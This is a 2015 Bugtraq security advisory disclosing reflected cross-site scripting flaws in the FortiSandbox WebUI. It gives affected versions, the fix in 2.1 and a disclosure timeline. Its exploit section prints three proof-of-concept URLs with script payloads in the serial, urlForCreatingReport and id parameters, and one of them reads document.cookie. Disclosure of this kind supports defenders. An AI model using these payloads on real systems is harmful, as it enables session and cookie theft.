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Message-Id: <201508010425.t714PY2I025178@sf01web1.securityfocus.com>
Date: Sat, 1 Aug 2015 04:25:34 GMT
From: hyp3rlinx@...os.com
To: bugtraq@...urityfocus.com
Subject: Multiple XSS vulnerabilities in FortiSandbox WebUI

[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:  http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt


Vendor:
================================
www.fortinet.com
PSIRT ID: 1418018



Product:
==================================
FortiSandbox 3000D v2.02 build0042


Vulnerability Type:
===================
XSS



CVE Reference:
==============
Pending



Advisory Information:
===========================================================================
Multiple XSS vulnerabilities in FortiSandbox WebUI

Impact

A remote unauthenticated attacker may be able to execute arbitrary code in
the security context of an authenticated user's browser session.

Affected Products

FortiSandbox 2.0.4 and lower.
Solutions

Upgrade to FortiSandbox 2.1 or above.



Vulnerability Details:
====================================================================
http://www.fortiguard.com/advisory/FG-IR-15-019/

The Web User Interface of FortiSandbox version 2.0.4 and below is
vulnerable to multiple reflected Cross-Site Scripting vulnerabilities.

5 potential XSS vectors were identified:

* Fortiview threats by users search filtered by serial
* Fortiview threats by users search filtered by vdom
* Export report feature in the Fortiview search page
* Screenshot download generated by the VM scan feature
* PCAP file download generated by the VM scan feature



Exploit code(s):
===============

1)
https://localhost/alerts/summary/profile/?prof_type=byusers-profile&from=byusers-filter&username=10.10.10.10&serial=<script>alert(666)</script><script>alert('XSS by hyp3rlinx 06012015')</script>&vdom=&from_time_period=1440#frag-1

vulnerable parameter: "serial"
------------------------------

2)
https://localhost/csearch/report/export/?urlForCreatingReport=<script>alert(666)</script><script>alert('XSS by hyp3rlinx June 1, 2015')</script>

vulnerable parameter: "urlForCreatingReport"
--------------------------------------------

3)
https://localhost/analysis/detail/download/screenshot?id="/><script>alert('XSS by hyp3rlinx June 1, 2015 '%2bdocument.cookie)</script>
 
vulnerable parameter: "id"
--------------------------



Disclosure Timeline:
========================================
Vendor Notification:  June 1, 2015
Vendor Disclosure: July 24, 2015
August 1, 2015  : Public Disclosure

Fixed In Firmware 2.1



Discovery Status:
=================
Published



Exploitation Technique:
=======================
Remote unauthenticated



Severity Level:
===============
Medium



Description:
=====================================================================


Request Method(s):              [+] GET


Vulnerable Product:             [+] FortiSandbox 3000D v2.02


Vulnerable Parameter(s):        [+] serial, urlForCreatingReport, id


Affected Area(s):               [+] FortiSandbox Web Admin UI


=====================================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.

by hyp3rlinx

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